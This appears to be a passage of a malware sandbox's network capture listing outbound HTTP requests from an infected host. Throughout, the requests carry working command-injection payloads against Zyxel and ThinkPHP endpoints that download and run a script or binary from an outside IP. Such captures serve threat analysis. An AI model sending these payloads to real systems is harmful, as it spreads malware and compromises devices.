Feb 14, 2024 09:29:41.689815044 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:43.129776001 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:46.009850025 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:51.897484064 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:03.417217970 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:26.968641043 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:14.071458101 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
330	192.168.2.15	55738	94.121.70.57	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:40.463227987 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
331	192.168.2.15	49286	62.29.4.152	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:40.463370085 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
332	192.168.2.15	43550	88.150.154.89	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:40.557095051 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:40.752705097 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 14 Feb 2024 08:29:40 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
333	192.168.2.15	57020	95.127.222.121	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:40.613939047 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:41.764339924 CET	16	IN	HTTP/1.0 200 OK Data Raw: Data Ascii:
Feb 14, 2024 09:29:41.788403988 CET	303	IN	Data Raw: 53 65 72 76 65 72 3a 20 47 6f 41 68 65 61 64 2d 57 65 62 73 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 53 49 44 3d 38 31 36 37 30 32 30 61 39 32 64 30 34 35 38 37 39 Data Ascii: Server: GoAhead-WebsX-Frame-Options: SAMEORIGINSet-Cookie: SID=8167020a92d045879fc1a74ab9eb038d; Max-Age=1200; Version=1Pragma: no-cacheCache-control: no-cacheContent-Type: text/html<html><head></head><body><script language=javascript>

Session ID	Source IP	Source Port	Destination IP	Destination Port
334	192.168.2.15	52838	62.29.36.186	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:40.700942993 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
335	192.168.2.15	57392	94.121.40.30	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:40.701050997 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
336	192.168.2.15	50064	31.47.61.98	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:40.728853941 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:41.007051945 CET	502	IN	HTTP/1.1 404 Not Found Date: Wed, 14 Feb 2024 08:29:40 GMT Server: Apache Content-Length: 338 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
337	192.168.2.15	42158	85.194.96.39	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:40.734076023 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:41.001857042 CET	251	IN	HTTP/1.1 407 Unauthorized Server: Zscaler proxy Cache-control: no-cache Content-Length: 0 Proxy-Authenticate: Digest realm="zscloud.net", qop="auth", opaque="2802348cd031ea39faf70f72f0b59b94", nonce=09d0c5448c4ba150884b13cee5517ce6

Session ID	Source IP	Source Port	Destination IP	Destination Port
338	192.168.2.15	55540	31.33.8.234	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:41.188046932 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:44.217705011 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
339	192.168.2.15	51814	85.22.139.235	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:41.217230082 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
340	192.168.2.15	38294	94.123.53.192	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:41.233452082 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
341	192.168.2.15	39794	94.122.69.75	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:41.235153913 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
342	192.168.2.15	48406	94.25.157.186	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:41.257910967 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:41.546916008 CET	337	IN	HTTP/1.1 405 Not Allowed Server: Web server Date: Wed, 14 Feb 2024 08:29:36 GMT Content-Type: text/html; charset=utf-8 Content-Length: 155 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>Web server</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
343	192.168.2.15	49184	85.122.212.45	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:41.327234030 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
344	192.168.2.15	56312	31.136.242.253	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:41.438858986 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:42.073757887 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:43.321741104 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:46.009773016 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:51.129528046 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:01.113245010 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
